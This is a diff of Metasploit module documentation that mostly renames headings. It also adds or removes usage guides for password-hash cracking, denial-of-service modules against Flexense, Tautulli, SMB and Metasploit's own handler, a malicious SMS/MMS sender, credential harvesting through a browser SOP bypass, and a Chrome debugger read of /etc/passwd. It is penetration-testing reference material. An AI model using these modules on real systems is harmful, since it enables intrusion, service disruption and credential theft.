-[+] oracle11_epsilon:epsilon
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-1f9piv4
-[*] Cracking oracle12c hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking oracle12c hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracked passwords this run:
-[+] oracle12c_epsilon:epsilon
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_oracle_fast) > creds
-Credentials
-===========
-
-host  origin  service  public             private                                                                                                                                                                                                                                                               realm  private_type        JtR Format
----  ------  -------  ------             -------                                                                                                                                                                                                                                                               -----  ------------        ----------
-                       simon              A                                                                                                                                                                                                                                                                            Password            
-                       simon              4F8BC1809CB2AF77                                                                                                                                                                                                                                                             Nonreplayable hash  des,oracle
-                       SYSTEM             THALES                                                                                                                                                                                                                                                                       Password            
-                       SYSTEM             9EEDFA0AD26C6D52                                                                                                                                                                                                                                                             Nonreplayable hash  des,oracle
-                       DEMO               epsilon                                                                                                                                                                                                                                                                      Password            
-                       DEMO               S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C         Nonreplayable hash  raw-sha1,oracle
-                       oracle11_epsilon   epsilon                                                                                                                                                                                                                                                                      Password            
-                       oracle11_epsilon   S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C         Nonreplayable hash  raw-sha1,oracle
-                       oracle12c_epsilon  epsilon                                                                                                                                                                                                                                                                      Password            
-                       oracle12c_epsilon  H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B                                                                        Nonreplayable hash  pbkdf2,oracle12c
-
-```
@@ -1,131 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode PostgreSQL
-  based password hashes, such as:
-
-  * `postgres` based passwords
-  * `raw-md5` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-  PostgreSQL is a `raw-md5` format with the username appended to the password.  This format was
-  added to JtR as `dynamic_1034` [here](https://github.com/magnumripper/JohnTheRipper/commit/e57d740bed5c4f4e40a0ff346bcdde270a8173e6)
-
-## Verification Steps
-
-  1. Have at least one user with an `postgres`, or `raw-md5` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_postgres_fast```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:example postgres:md5be86a79bf2043622d58d5453c47d4860
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_postgres_fast 
-msf5 auxiliary(analyze/jtr_postgres_fast) > run
-
-[*] Hashes written out to /tmp/hashes_tmp20190211-6421-1hooxft
-[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-1hv6clq
-[*] Cracking dynamic_1034 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking dynamic_1034 hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking dynamic_1034 hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked passwords this run:
-[+] example:password
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_postgres_fast) > creds
-Credentials
-===========
-
-host  origin  service  public   private                              realm  private_type  JtR Format
----  ------  -------  ------   -------                              -----  ------------  ----------
-                       example  md5be86a79bf2043622d58d5453c47d4860         Postgres md5  raw-md5,postgres
-                       example  password                                    Password      
-
-```
@@ -1,158 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode Windows
-  based password hashes, such as:
-
-  * `LM`, or `LANMAN` based passwords
-  * `NT`, `NTLM`, or `NTLANMAN` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-## Verification Steps
-
-  1. Have at least one user with an `nt` or `lm` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_windows_fast```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:lm_password ntlm:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C jtr:lm
-creds add user:nt_password ntlm:AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C jtr:nt
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_windows_fast 
-msf5 auxiliary(analyze/jtr_windows_fast) > run
-
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-koittz
-[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-1v82lkm
-[*] Cracking lm hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-Using default target encoding: CP850
-Warning: poor OpenMP scalability for this hash type, consider --fork=8
-Will run 8 OpenMP threads
-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:00 DONE (2019-02-11 19:34) 0g/s 1177Kp/s 1177Kc/s 1177KC/s PLANO..VAGRANT
-Session completed
-[*] Cracking lm hashes in single mode...
-Using default input encoding: UTF-8
-Using default target encoding: CP850
-Warning: poor OpenMP scalability for this hash type, consider --fork=8
-Will run 8 OpenMP threads
-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:02 DONE (2019-02-11 19:34) 0g/s 4634Kp/s 4634Kc/s 4634KC/s WAC1907..E1900
-Session completed
-[*] Cracking lm hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-Using default target encoding: CP850
-Warning: poor OpenMP scalability for this hash type, consider --fork=8
-Will run 8 OpenMP threads
-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:00 DONE (2019-02-11 19:34) 0g/s 41152Kp/s 41152Kc/s 41152KC/s 0766269..0769743
-Session completed
-[*] Cracked Passwords this run:
-[+] lm_password:password
-[*] Cracking nt hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking nt hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking nt hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] lm_password:password
-[+] nt_password:password
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_windows_fast) > creds
-Credentials
-===========
-
-host  origin  service  public       private                                                            realm  private_type  JtR Format
----  ------  -------  ------       -------                                                            -----  ------------  ----------
-                       lm_password  password                                                                  Password      
-                       lm_password  e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c         NTLM hash     nt,lm
-                       nt_password  password                                                                  Password      
-                       nt_password  aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c         NTLM hash     nt,lm
-
-```
@@ -1,10 +1,12 @@
+## Vulnerable Application
+
 The ```auxiliary/client/mms/send_mms``` module allows you to send a malicious attachment to a
 collection of phone numbers of the same carrier.

 In order to use this module, you must set up your own SMTP server to deliver messages. Popular
 mail services such as Gmail, Yahoo, Live should work fine.

-## Module Options
+## Options

 **CELLNUMBERS**

@@ -74,7 +76,7 @@ in order to receive the text, such as AT&T.

 The MMS subject. Some carriers require this in order to receive the text, such as AT&T.

-## Supported Carrier Gateways
+### Supported Carrier Gateways

 The module supports the following carriers:

@@ -84,14 +86,14 @@ The module supports the following carriers:
 * Verizon
 * Google Fi

-## Finding the Carrier for a Phone Number
+### Finding the Carrier for a Phone Number

 Since you need to manually choose the carrier gateway for the phone numbers, you need to figure out
 how to identify the carrier of a phone number. There are many services that can do this, such as:

 http://freecarrierlookup.com/

-## Gmail SMTP Example
+### Gmail SMTP Example

 Gmail is a popular mail server, so we will use this as a demonstration.

@@ -111,7 +113,7 @@ After creating the application password, configure auxiliary/client/mms/send_mms

 And you should be ready to go.

-## Yahoo SMTP Example
+### Yahoo SMTP Example

 Yahoo is also a fairly popular mail server (although much slower to deliver comparing to Gmail),
 so we will demonstrate as well.
@@ -136,7 +138,7 @@ After configuring your Yahoo account, configure auxiliary/client/mms/send_mms th

 And you're good to go.

-## Demonstration
+## Scenarios

 After setting up your mail server and the module, your output should look similar to this:

@@ -1,10 +1,12 @@
+## Vulnerable Application
+
 The ```auxiliary/client/sms/send_text``` module allows you to send a malicious text/link to a collection
 of phone numbers of the same carrier.

 In order to use this module, you must set up your own SMTP server to deliver messages. Popular
 mail services such as Gmail, Yahoo, Live should work fine.

-## Module Options
+## Options

 **CELLNUMBERS**

@@ -57,7 +59,7 @@ The password you use to log into the SMTP server.

 The FROM field of SMTP. In some cases, it may be used as ```SMTPUSER```.

-## Supported Carrier Gateways
+### Supported Carrier Gateways

 The module supports the following carriers:

@@ -73,7 +75,7 @@ The module supports the following carriers:
 **Note:** During development, we could not find a valid gateway for Sprint, therefore it is currently
 not supported.

-## Finding the Carrier for a Phone Number
+### Finding the Carrier for a Phone Number

 Since you need to manually choose the carrier gateway for the phone numbers, you need to figure out
 how to identify the carrier of a phone number. There are many services that can do this, such as:
@@ -82,7 +84,7 @@ http://freecarrierlookup.com/

 **Note:** If the phone is using Google Fi, then it may appear as a different carrier.

-## Gmail SMTP Example
+### Gmail SMTP Example

 Gmail is a popular mail server, so we will use this as a demonstration.

@@ -100,7 +102,7 @@ After creating the application password, configure auxiliary/client/sms/send_tex

 And you should be ready to go.

-## Yahoo SMTP Example
+### Yahoo SMTP Example

 Yahoo is also a fairly popular mail server (although much slower to deliver comparing to Gmail),
 so we will demonstrate as well.
@@ -123,7 +125,7 @@ After configuring your Yahoo account, configure auxiliary/client/sms/send_text t

 And you're good to go.

-## Demonstration
+### Scenarios

 After setting up your mail server and the module, your output should look similar to this:

@@ -1,14 +1,14 @@
-## Description
-This module triggers a Denial of Service vulnerability in the Flexense Enterprise HTTP server. It is possible to trigger 
-a write access memory vialation via rapidly sending HTTP requests with large HTTP header values.  
+## Vulnerable Application

+### Description
+
+This module triggers a Denial of Service vulnerability in the Flexense Enterprise HTTP server. It is possible to trigger
+a write access memory vialation via rapidly sending HTTP requests with large HTTP header values.

-## Vulnerable Application 
 According To publicly exploit Disclosure of Flexense HTTP Server v10.6.24
 Following list of softwares are vulnerable to Denial Of Service.
 read more : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8065

-	
 DiskBoss Enterprise    <= v9.0.18
 Sync Breeze Enterprise <= v10.6.24
 Disk Pulse Enterprise  <= v10.6.24
@@ -16,8 +16,7 @@ Disk Savvy Enterprise  <= v10.6.24
 Dup Scout Enterprise   <= v10.6.24
 VX Search Enterprise   <= v10.6.24

-
-**Vulnerable Application Link** 
+**Vulnerable Application Link**
 http://www.diskboss.com/downloads.html
 http://www.syncbreeze.com/downloads.html
 http://www.diskpulse.com/downloads.html
@@ -25,7 +24,8 @@ http://www.disksavvy.com/downloads.html
 http://www.dupscout.com/downloads.html


-## Vulnerable Application Installation Setup.
+### Installation Setup.
+
 All Flexense applications that are listed above can be installed by following these steps.

 Download Application : ```https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS/raw/master/syncbreezeent_setup_v10.6.24.exe```
@@ -51,7 +51,9 @@ Check the box saying: ```Enable web server on port:...```
  8. Web server will crash after 200-1000 request depending on the OS version and system memory.

 ## Scenarios
-**TESTED AGAINST WINDOWS 7/10**
+
+### WINDOWS 7/10
+
 ```
 msf5 > use auxiliary/dos/http/flexense_http_server_dos 
 msf5 auxiliary(dos/http/flexense_http_server_dos) > set rhost 192.168.1.27
@@ -15,7 +15,7 @@ Vulnerable app versions include:

 Related security bulletin from IBM: http://www-01.ibm.com/support/docview.wss?uid=swg21999385

-## Verification
+## Verification Steps

 1. Start msfconsole
 1. `use auxiliary/dos/http/ibm_lotus_notes.rb`
@@ -15,7 +15,7 @@ IBM Notes 8.5 release

 Related security bulletin from IBM: http://www-01.ibm.com/support/docview.wss?uid=swg21999384 

-## Verification
+## Verification Steps

 Start msfconsole

@@ -6,7 +6,7 @@ Versions before 0.3.19 are vulnerable.
 Any application that uses a vulnerable version of this module and passes untrusted input
 to the module will be vulnerable.

-## How to Install
+### How to Install

 To install a vulnerable version of `marked`, run:
 ```
@@ -15,8 +15,6 @@ npm i marked@0.3.19

 ## Verification Steps

-Example steps in this format (is also in the PR):
-
 1. Create a new directory for test application.
 2. Copy below example server into test application directory as `server.js`.
 3. Run `npm i express` to install express in the test application directory.
@@ -0,0 +1,36 @@
+## Vulnerable Application
+
+ Metasploit Framework before version 5.0.28
+
+## Verification Steps
+
+  1. Install Metasploit 5.0.27 or earlier (or checkout before commit 5621d200ccf62e4a8f0dad80c1c74f4e0e52d86b)
+  2. Start msfconsole with the target Metasploit instance and start any reverse_http/reverse_https listener
+  3. Start this module and set RHOSTS and RPORT to the target listener address and port.
+  4. Run the modulest <rhost>```
+  7. `msfconsole` should use 99%+ CPU for a varying amount of time depending on the DOSTYPE option. You may need to kill the process manually.
+
+## Options
+
+ **DOSTYPE**
+
+	GENTLE: *Current sessions will continue to work, but not future ones*
+	  A lack of input sanitation permits an attacker to submit a request that will be added to the resources and will be used as regex rule it is possible then to make a valid regex rule that captures all the new handler requests. The sessions that were established previously will continue to work.
+
+	SOFT: *No past or future sessions will work*
+      A lack of input sanitation and lack of exception handling causes Metasploit to behave abnormally when looking an appropriate resource for the request, by submitting an invalid regex as a resource. This means that no request, current or future will get served an answer.
+
+	HARD: *ReDOS or Catastrophic Regex Backtracking*
+	  A lack of input sanitization on paths added as resources allows an attacker to execute a catastrophic regex backtracking operation causing a Denial of Service by CPU consumption.
+
+## Scenarios
+
+```
+msf5 auxiliary(dos/http/metasploit_httphandler_dos) > run
+[*] Running module against 127.0.0.1
+
+[*] 127.0.0.1:8080 - Sending DoS packet...
+^C[-] Stopping running againest current target...
+[*] Control-C again to force quit all targets.
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,16 @@
+## Vulnerable Application
+Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the `/shutdown` URL in applications that do
+not have a user login area enabled.
+
+## Scenario
+
+![72550314-80cd8a00-38a3-11ea-9bad-942668a29390](https://user-images.githubusercontent.com/15425071/72602337-29bdc880-3928-11ea-8aec-ddadb3ff4f2d.png)
+
+## Verification Steps :
+
+List the steps needed to make sure this thing works
+
+1. Start ```msfconsole```
+2. ```use auxiliary/dos/http/tautulli_shutdown_exec```
+3. ```set RHOSTS XXX.XXX.XXX.XXX```
+4. ```run```
@@ -6,7 +6,7 @@ Any application that uses a vulnerable version of this module and calls the `get
 or `getResult` functions will be vulnerable to this module.  An example server is provided
 below.

-## How to Install
+### How to Install

 To install a vulnerable version of `ua-parser-js`, run:
 ```
@@ -15,8 +15,6 @@ npm i ua-parser-js@0.7.15

 ## Verification Steps

-Example steps in this format (is also in the PR):
-
 1. Create a new directory for test application.
 2. Copy below example server into test application directory as `server.js`.
 3. Run `npm i express` to install express in the test application directory.
@@ -55,7 +55,7 @@ at ../src/ephy-main.c line 432

 ```

-## Verification
+## Verification Steps

    Start msfconsole
    use auxiliary/dos/http/webkitplus
@@ -10,18 +10,14 @@

 ## Verification Steps

-  Example steps in this format (is also in the PR):
-
  1. Start msfconsole
-  1. Do: `use auxiliary/dos/smb/smb_loris`
-  1. Do: `set rhost [IP]`
-  1. Do: `run`
-  1. Target should allocate increasing amounts of memory.
+  2. Do: `use auxiliary/dos/smb/smb_loris`
+  3. Do: `set rhost [IP]`
+  4. Do: `run`
+  5. Target should allocate increasing amounts of memory.

 ## Scenarios

-### 
-
 ```
 msf auxiliary(smb_loris) > use auxiliary/dos/smb/smb_loris
 msf auxiliary(smb_loris) > set RHOST 192.168.172.138
@@ -1,4 +1,4 @@
-## Description
+## Vulnerable Application

 This module exploits three vulnerabilities in Advantech WebAccess.

@@ -12,9 +12,6 @@ The final vulnerability exploited is that the HTML Form on the user edit page co
 plain text password in the masked password input box. Typically the system should replace the
 actual password with a masked character such as "*".

-
-## Vulnerable Application
-
 Version 8.1 was tested during development:

 http://advcloudfiles.advantech.com/web/Download/webaccess/8.1/AdvantechWebAccessUSANode8.1_20151230.exe
@@ -41,7 +38,6 @@ The username to use to log into Advantech WebAccess. By default, there is a buil
 The password to use to log into AdvanTech WebAccess. By default, the built-in account ```admin```
 does not have a password, which could be something you can use.

-
-## Demo
+## Scenarios

 ![webaccess_steal_creds](https://cloud.githubusercontent.com/assets/1170914/22353246/34b2045e-e3e5-11e6-992c-f3ab9dcbe716.gif)
@@ -4,7 +4,7 @@ This module retrieves a browser's network interface IP addresses using WebRTC. H

 Related links : https://datarift.blogspot.in/p/private-ip-leakage-using-webrtc.html

-## Verification
+## Verification Steps

    Start msfconsole
    use auxiliary/gather/browser_lanipleak
@@ -1,4 +1,7 @@
-The module use the Censys REST API to access the same data accessible through web interface. The search endpoint allows searches against the current data in the IPv4, Top Million Websites, and Certificates indexes using the same search syntax as the primary site.
+## Vulnerable Application
+
+The module use the Censys REST API to access the same data accessible through web interface.
+The search endpoint allows searches against the current data in the IPv4, Top Million Websites, and Certificates indexes using the same search syntax as the primary site.

 ## Verification Steps

@@ -207,8 +210,3 @@ msf auxiliary(censys_search) > run
 [+] wesecure.nl - [997423]
 [*] Auxiliary module execution completed
 ```
-
-
-## References
-
-1. https://censys.io/api
@@ -0,0 +1,46 @@
+# Chrome Debugger Arbitary File Read / Abitrary Web Request Auxiliary Module
+
+This module takes advantage of misconfigured headless chrome sessions and either retrieves a specified file off the remote file system, or makes a web request from the remote machine.
+
+## Headless Chrome Sessions
+	
+A vulnerable Headless Chrome session can be started with the following command:
+
+```
+$ google-chrome --remote-debugging-port=9222 --headless --remote-debugging-address=0.0.0.0
+```
+
+This will start a webserver running on port 9222 for all network interfaces.
+
+## Verification Steps
+	
+1. Start `msfconsole`
+2. Execute `auxiliary/gather/chrome_debugger`
+3. Execute `set RHOST $REMOTE_ADDRESS`
+4. Execute `set RPORT 9222`
+5. Execute either `set FILEPATH $FILE_PATH_ON_REMOTE` or `set URL $URL_FROM_REMOTE`
+6. Execute `run`
+
+## Options
+
+* FILEPATH - The file path on the remote you wish to retrieve
+* URL - A URL you wish to fetch the contents of from the remote machine
+
+**Note:** One or the other must be set!
+
+## Example Run
+
+```
+[*] Attempting Connection to ws://192.168.20.168:9222/devtools/page/CF551031373306B35F961C6C0968DAEC
+[*] Opened connection
+[*] Attempting to load url file:///etc/passwd
+[*] Received Data
+[*] Sending request for data
+[*] Received Data
+[+] Retrieved resource
+[*] Auxiliary module execution completed
+```
+
+## Notes
+
+This can be useful for retrieving cloud metadata in certain scenarios.  Primarily this module targets developers.
@@ -9,7 +9,7 @@ accounts are enabled or disabled/locked out.
 To use kerberos_enumusers, make sure you are able to connect to the
 Kerberos service on a Domain Controller.

-## Scenario
+## Scenarios

 The following demonstrates basic usage, using a custom wordlist,
 targeting a single Domain Controller to identify valid domain user
@@ -1,4 +1,4 @@
-## Description
+## Vulnerable Application

 Nuuo CMS Session Bruteforce

@@ -49,8 +49,6 @@ Secondly, due to the nature of this application, it is normal to have the softwa

 It is worth noticing that when a user logs in, the session has to be maintained by periodically sending a PING request. To bruteforce the session, we send each guess with a PING request until a 200 OK message is received. 

-## Vulnerable Application
-
 [NUUO Central Management Server (CMS): all versions below 2.4.0](d1.nuuo.com/NUUO/CMS/)

 - 1.5.2 OK
@@ -73,9 +71,3 @@ msf5 auxiliary(gather/nuuo_cms_bruteforce) > exploit
 [*] Auxiliary module execution completed
 msf5 auxiliary(gather/nuuo_cms_bruteforce) >
 ```
-
-## References
-
-https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02
-
-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt
@@ -1,4 +1,4 @@
-## Description
+## Vulnerable Application

 Nuuo CMS Authenticated Arbitrary File Download

@@ -26,8 +26,6 @@ This module works in the following way:

 Due to the lack of ZIP encryption support in Metasploit, the module prints a warning indicating that the archive cannot be unzipped in Msf.

-## Vulnerable Application
-
 [NUUO Central Management Server (CMS): all versions up to and including 3.5.0](http://d1.nuuo.com/NUUO/CMS/)

 The following versions were tested:
@@ -63,9 +61,3 @@ msf5 auxiliary(gather/nuuo_cms_file_download) > exploit
 [*] Auxiliary module execution completed
 msf5 auxiliary(gather/nuuo_cms_file_download) >
 ```
-
-## References
-
- https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02
-
- https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt
@@ -1,3 +1,5 @@
+## Vulnerable Application
+
 External python module compatible with v2 and v3.

 Enumerate valid usernames (email addresses) from Office 365 using ActiveSync.
@@ -14,9 +16,7 @@ Microsoft Security Response Center stated on 2017-06-28 that this issue does not

 This script is maintaing the ability to run independently of MSF.

-## Vulnerable Application
-
-  Office365's implementation of ActiveSync
+Office365's implementation of ActiveSync is vulnerable.

 ## Verification Steps

@@ -41,6 +41,7 @@ This script is maintaing the ability to run independently of MSF.


 ## Scenarios
+
 The following demonstrates basic usage, using the supplied users wordlist
 and default options.

@@ -72,6 +73,3 @@ grimhacker.com  ..        |
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
 ```
-
-## References
-https://grimhacker.com/2017/07/24/office365-activesync-username-enumeration/
@@ -1,10 +1,11 @@
-## Description
-This module takes advantage of a Same-Origin Policy (SOP) bypass vulnerability in the Samsung Internet Browser (CVE-2017-17692), a popular mobile browser shipping with Samsung Android devices. By default, it initiates a redirect to a child tab, and rewrites the innerHTML to gather credentials via a fake pop-up and the gather credentials is stored in `creds`
-
 ## Vulnerable Application
+
 This Module was tested on Samsung Internet Browser 5.4.02.3 during development.

+This module takes advantage of a Same-Origin Policy (SOP) bypass vulnerability in the Samsung Internet Browser (CVE-2017-17692), a popular mobile browser shipping with Samsung Android devices. By default, it initiates a redirect to a child tab, and rewrites the innerHTML to gather credentials via a fake pop-up and the gather credentials is stored in `creds`
+
 ## Verification Steps
+
 1. Start `msfconsole -q`
 2. `use auxiliary/gather/samsung_browser_sop_bypass`
 3. `set SRVHOST`
@@ -14,6 +15,7 @@ This Module was tested on Samsung Internet Browser 5.4.02.3 during development.
 5. `run`

 ## Scenarios
+
 ```
 $ sudo msfconsole -q
 msf > use auxiliary/gather/samsung_browser_sop_bypass
@@ -49,8 +51,6 @@ host            origin          service          public          private
 msf auxiliary(samsung_browser_sop_bypass) >
 ```

-## Demos
-
 Working of MSF Module: `https://youtu.be/ulU98cWVhoI`

 Vulnerable Browser: `https://youtu.be/lpkbogxJXnw`
@@ -1,6 +1,6 @@
 ## Vulnerable Application

-More information can be found on the [Rapid7 Blog](https://community.rapid7.com/community/metasploit/blog/2010/03/08/locate-and-exploit-the-energizer-trojan).
+More information can be found on the [Rapid7 Blog](https://blog.rapid7.com/2010/03/08/locate-and-exploit-the-energizer-trojan).
 Energizer's "DUO" USB Battery Charger included a backdoor which listens on port 7777.

 The software can be downloaded from the [Wayback Machine](http://web.archive.org/web/20080722134654/www.energizer.com/usbcharger/language/english/download.aspx).
@@ -1,5 +1,5 @@

-## About
+## Description

 This module simply queries the DB2 discovery service for information.
 The discovery service is integrated with the Configuration Assistant and the DB2® administration server.
@@ -12,9 +12,10 @@ Using the discovery method, catalog information for a remote server can be autom
 3. `set THREDS [number of threads]`
 4. `run`

-
 ## Scenarios
- DB2 `9.07.2` running at a `RHEL 6.9` .
+
+### DB2 9.07.2 on RHEL 6.9
+
 ```
 msf auxiliary(scanner/db2/discovery) > set RHOSTS 192.168.1.25
 msf auxiliary(scanner/db2/discovery) > run
@@ -1,10 +1,10 @@
+## Vulnerable Application
+
 This module exploits a directory traversal vulnerability in Easy File Sharing FTP Server 3.6, or
 prior. It abuses the RETR command in FTP in order to retrieve a file outside the shared directory.

 By default, anonymous access is allowed by the FTP server.

-## Vulnerable Application
-
 Easy File Sharing FTP Server version 3.6 or prior should be affected. You can download the
 vulnerable application from the official website:

@@ -22,6 +22,6 @@ The FTP server IP address.

 The file you wish to download. Assume this path starts from C:\

-## Demonstration
+## Scenarios

 ![ftp](https://cloud.githubusercontent.com/assets/1170914/23971054/4fdc2b08-099a-11e7-88ea-67a678628e49.gif)
@@ -1,9 +1,7 @@
-## Description
+## Vulnerable Application

 This module allows you to authenticate to Advantech WebAccess.

-## Vulnerable Application
-
 This module was specifically tested on versions 8.0, 8.1, and 8.2:

 **8.2 Download**
@@ -23,7 +21,6 @@ Note:
 By default, Advantech WebAccess comes with a built-in account named ```admin```, with a blank
 password.

-
 ## Verification Steps

 1. Make sure Advantech WebAccess is up and running
@@ -34,6 +31,6 @@ password.
 6. ```run```
 7. You should see that the module is attempting to log in.

-## Demo
+## Scenarios

 ![webaccess_login_demo](https://cloud.githubusercontent.com/assets/1170914/22352301/26549236-e3e1-11e6-9710-506166a8bee3.gif)
@@ -0,0 +1,42 @@
+## Vulnerable Application
+
